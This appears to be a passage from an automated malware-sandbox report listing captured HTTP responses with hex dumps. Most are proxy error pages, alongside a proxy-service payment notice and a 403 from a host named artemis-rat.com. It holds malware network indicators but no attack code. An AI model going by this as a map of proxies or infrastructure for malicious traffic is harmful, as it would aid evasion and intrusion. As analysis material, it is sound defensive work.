Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:13 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 281Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:13 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:13 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:13 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:13 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:13 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:13 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:13 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:13 GMTContent-Type: text/html;charset=utf-8Content-Length: 3832X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>E
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Headers: Content-Type,AccessToken,X-CSRF-Token, Authorization, TokenAccess-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE,UPDATEAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Content-TypeContent-Type: text/plain; charset=utf-8Set-Cookie: uuid=8b1086ba-de0e-11ee-9749-fa20201ff994; Path=/; Max-Age=8640000; HttpOnlyX-Content-Type-Options: nosniffDate: Sat, 09 Mar 2024 12:14:13 GMTContent-Length: 31Data Raw: 75 6e 73 75 70 70 6f 72 74 65 64 20 70 72 6f 74 6f 63 6f 6c 20 73 63 68 65 6d 65 20 22 22 0a Data Ascii: unsupported protocol scheme ""
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:14 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:14 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlServer: Zscaler/6.2Cache-Control: no-cacheAccess-Control-Allow-Origin: *Content-length: 13597Data Raw: 3c 21 2d 2d 23 20 49 64 3a 20 63 6c 6f 73 65 64 70 72 6f 78 79 2e 68 74 6d 6c 20 32 38 35 31 34 34 20 32 30 32 31 2d 30 36 2d 31 36 20 30 35 3a 30 32 3a 30 36 5a 20 73 7a 68 61 6e 67 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 63 2e 6f 72 67 2f 54 52 2f 31 39 39 39 2f 52 45 43 2d 68 74 6d 6c 34 30 31 2d 31 39 39 39 31 32 32 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 73 63 61 6c 65 72 20 6d 61 6b 65 73 20 74 68 65 20 69 6e 74 65 72 6e 65 74 20 73 61 66 65 20 66 6f 72 20 62 75 73 69 6e 65 73 73 65 73 20 62 79 20 70 72 6f 74 65 63 74 69 6e 67 20 74 68 65 69 72 20 65 6d 70 6c 6f 79 65 65 73 20 66 72 6f 6d 20 6d 61 6c 77 61 72 65 2c 20 76 69 72 75 73 65 73 2c 20 61 6e 64 20 6f 74 68 65 72 20 73 65 63 75 72 69 74 79 20 74 68 72 65 61 74 73 2e 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 74 69 74 6c 65 3e 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 62 79 20 5a 73 63 61 6c 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 76 61 72 20 64 65 66 4c 61 6e 67 20 3d 20 27 65 6e 5f 55 53 27 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 3c 69 6d 67 20 61 6c 74 3d 22 5a 73 63 61 6c 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 7a 73 63 6c 6f 75 64 2e 6e 65 74 2f 69 6d 67 5f 6c 6f 67 6f 5f 6e 65 77 31 2e 70 6e 67 22 3e 2d 2d 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 33 65 33 65 33 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0a 63 6f 6c 6f 72 3a 23 34 42 34 46 35 34 3b 0a 7d 0a 61 20 7b 0a 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0a 63 6f 6c 6f 72 3a 23 30 30 39 64 64 30 3b 0a 7d 0a 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0a 7d 0a 74 64 20 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 7d 0a 69 6d 67 20 7b 0a 6d
